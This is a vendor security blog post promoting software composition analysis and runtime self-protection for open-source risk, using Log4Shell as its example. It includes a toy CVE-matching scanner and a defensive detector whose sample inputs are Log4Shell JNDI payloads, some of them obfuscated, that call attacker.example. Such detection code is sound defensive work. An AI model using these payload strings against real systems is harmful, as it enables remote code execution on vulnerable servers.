Open source brings security risk, but SCA & RASP can help


For a deep dive on the security risks of OSS, listen to Contrast CPO Steve Wilson's conversation with Secure Talk.
How secure is your online banking app? Don't know? Join the club.

Web applications are built on the code equivalent of tangled spaghetti, including open-source software (OSS) with funny, obscure names: say, Apache, Struts or Log4j. Any of that software can introduce security issues the moment a new vulnerability is discovered in it.
One excruciating example was Log4j, a simple logging library. In December 2021, it was discovered to have a serious security flaw (Log4Shell, CVE-2021-44228) that was being exploited within hours of its discovery going public.
It's not that OSS is more prone to security flaws than proprietary software, mind you. No, the problem is that these open-source components are extremely pervasive. If somebody finds a vulnerability in one of them, they can use that flaw to exploit thousands, or even millions, of applications.
There are a slew of tools to scan code. But these legacy scanners aren't suited to modern software development. They bleat out so many false positives that the alerts wind up getting ignored.
Fortunately, modern tools use an approach better suited to modern application development. Called Software Composition Analysis (SCA), these tools inventory the open-source libraries in your application (including the ones your libraries pull in) and check them against the MITRE CVE database and the vulnerability feeds built on it. One such tool is CodeSec, a free tool from Contrast that you can run against your application's libraries to sniff out known vulnerabilities. The key word is known: SCA can only flag a flaw that has already been published and mapped to an affected version range.
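To make the SCA idea concrete, here is a small added example (not CodeSec's code, nor any other Contrast tool) that does what an SCA scanner does at its core: parse a dependency manifest, look each library up in an advisory table, and compare the installed version against the affected range. The manifest and the three-entry advisory table are constructed for this example (the version ranges are taken from the public CVE records for Log4Shell and Spring4Shell); a real tool pulls thousands of advisories from NVD or a vendor feed and reads the manifest from your build.

```python
"""Minimal Software Composition Analysis check.

Matches a dependency manifest against known-vulnerable version ranges,
the way an SCA tool matches your libraries against CVE data.
"""
import re
from dataclasses import dataclass

# Constructed sample manifest for this example: Maven coordinates,
# one groupId:artifactId:version per line.
SAMPLE_MANIFEST = """
org.apache.logging.log4j:log4j-core:2.14.1
org.apache.logging.log4j:log4j-api:2.14.1
org.springframework:spring-beans:5.3.18
org.apache.struts:struts2-core:2.5.30
"""


@dataclass(frozen=True)
class Advisory:
    cve: str
    artifact: str      # groupId:artifactId
    introduced: str    # first affected version (inclusive)
    fixed: str         # first fixed version (exclusive)


# Tiny advisory table constructed for this example from public CVE data.
# A real SCA tool pulls thousands of these from NVD or a vendor feed.
ADVISORIES = [
    Advisory("CVE-2021-44228", "org.apache.logging.log4j:log4j-core", "2.0-beta9", "2.15.0"),
    Advisory("CVE-2022-22965", "org.springframework:spring-beans", "5.3.0", "5.3.18"),
    Advisory("CVE-2022-22965", "org.springframework:spring-beans", "5.2.0", "5.2.20"),
]

_VERSION = re.compile(r"^(\d+(?:\.\d+)*)(?:[-.]?([A-Za-z].*))?$")


def version_key(version):
    """Sort key for Maven-style versions: numeric parts first, and a
    pre-release (2.0-beta9) sorts before the matching release (2.0)."""
    m = _VERSION.match(version)
    if not m:
        raise ValueError(f"unparseable version: {version!r}")
    nums = tuple(int(x) for x in m.group(1).split("."))
    nums += (0,) * (4 - len(nums))          # pad so 2.14 == 2.14.0.0
    pre = m.group(2)
    return nums + ((1, "") if pre is None else (0, pre))


def is_affected(version, adv):
    """True when introduced <= version < fixed."""
    key = version_key(version)
    return version_key(adv.introduced) <= key < version_key(adv.fixed)


def scan(manifest):
    """Return (coordinate, cve, fixed_version) for each vulnerable dependency."""
    findings = []
    for line in manifest.strip().splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        group, artifact, version = line.split(":")
        coordinate = f"{group}:{artifact}"
        for adv in ADVISORIES:
            if adv.artifact == coordinate and is_affected(version, adv):
                findings.append((line, adv.cve, adv.fixed))
    return findings


if __name__ == "__main__":
    for coordinate, cve, fixed in scan(SAMPLE_MANIFEST):
        print(f"{coordinate}: {cve}, upgrade to >= {fixed}")
```

Two details matter in practice. Version comparison has to be semantic, not textual, or `2.0-beta9` and `2.14.1` sort wrong and you get exactly the false positives and negatives the post complains about. And the match is only as good as the advisory table: `log4j-api` is correctly not flagged here because only `log4j-core` is affected, but a library nobody has filed a CVE for will never show up, however vulnerable it is.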
But SCA won't protect you from zero-day vulnerabilities such as Log4Shell and Spring4Shell: on day zero there is no CVE entry for the scanner to match. For that, you need runtime protection built into your applications. In the case of Log4j, if you were running Runtime Application Self-Protection (RASP), you didn't need to know about the Log4j library's flaw. Rather, RASP would have detected the application behavior associated with common web application vulnerabilities, such as the injection attack enabled by the Log4j vulnerability: attacker-controlled input landing in a log message and triggering a lookup to a server the attacker controls.
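The following added example (not Contrast Protect's code, and not how any particular RASP product is built) models the runtime side of that argument in simplified form: a check that runs on untrusted input before it reaches the logging sink, resolves the nested `${...}` substitutions attackers used to hide the Log4Shell payload, and blocks the request if a JNDI lookup appears. The request headers are constructed samples; `inspect_input` and `guarded_log` are names chosen for this example. A production RASP agent hooks the JNDI lookup call inside the runtime rather than pattern-matching strings, which is why it catches variants this de-obfuscator does not model.

```python
"""Runtime detection of lookup injection in untrusted input.

Models what a runtime protection layer checks before data reaches a
logging sink: resolve the nested ${...} substitutions attackers use to
hide a JNDI lookup, then block if one appears. Simplified on purpose:
real RASP hooks the JNDI call itself rather than matching strings.
"""
import re

# Innermost ${...} expression: no nested braces or '$' inside.
_INNER = re.compile(r"\$\{([^${}]*)\}")
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def _resolve_one(body):
    """Resolve one innermost lookup the way a Log4j-style StrSubstitutor
    would. Only the variants needed for de-obfuscation are modelled."""
    if ":-" in body:                       # ${unknown:-default} yields the default
        return body.split(":-", 1)[1]
    prefix, sep, arg = body.partition(":")
    if sep and prefix.lower() == "lower":
        return arg.lower()
    if sep and prefix.lower() == "upper":
        return arg.upper()
    return "${" + body + "}"               # unknown lookups (incl. jndi) are left as-is


def deobfuscate(value, max_rounds=16):
    """Repeatedly resolve innermost lookups until nothing changes."""
    for _ in range(max_rounds):
        resolved = _INNER.sub(lambda m: _resolve_one(m.group(1)), value)
        if resolved == value:
            break
        value = resolved
    return value


def inspect_input(value):
    """Return ('block', reason) or ('allow', None) for one untrusted string."""
    resolved = deobfuscate(value)
    if _JNDI.search(resolved):
        return "block", f"jndi lookup in untrusted input: {resolved}"
    return "allow", None


def guarded_log(entries):
    """Apply the check to each entry before it would reach the logger.
    Returns the decisions so the caller can audit them."""
    decisions = []
    for entry in entries:
        verdict, reason = inspect_input(entry)
        if verdict == "block":
            # A real RASP agent short-circuits the request here; we record it.
            decisions.append(("blocked", entry, reason))
        else:
            decisions.append(("logged", entry, None))
    return decisions


# Constructed sample User-Agent values for this example.
SAMPLE_INPUTS = [
    "Mozilla/5.0 (X11; Linux x86_64)",
    "${jndi:ldap://attacker.example/a}",
    "${${lower:j}ndi:${lower:l}dap://attacker.example/a}",
    "${${::-j}${::-n}${::-d}${::-i}:ldap://attacker.example/a}",
    "${date:yyyy-MM-dd}",
]

if __name__ == "__main__":
    for verdict, entry, reason in guarded_log(SAMPLE_INPUTS):
        print(verdict, entry, reason or "")
```

The point of the example is the one the paragraph makes: nothing in this check knows which library is vulnerable or which version is installed. It keys on the behavior (an expression in untrusted input that would resolve to a JNDI lookup), so it fires on the first day of the attack, before any advisory exists for an SCA tool to match.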
When customers using our Contrast Protect RASP tool tested for Log4j, their apps weren't exploitable. What that means: their developers got to go home for the weekend instead of hunting for Log4j and patching. Runtime protection buys that time; the vulnerable library still has to be found and updated afterward, which is where SCA comes back in.
Don't fear OSS. Just make sure you've got the right tools to ensure it's a polite guest inside your application, one that lets your devs relax on the weekend.

Lisa Vaas, Senior Content Marketing Manager



https://securityboulevard.com/2022/09/open-source-brings-security-risk-but-sca-rasp-can-help/
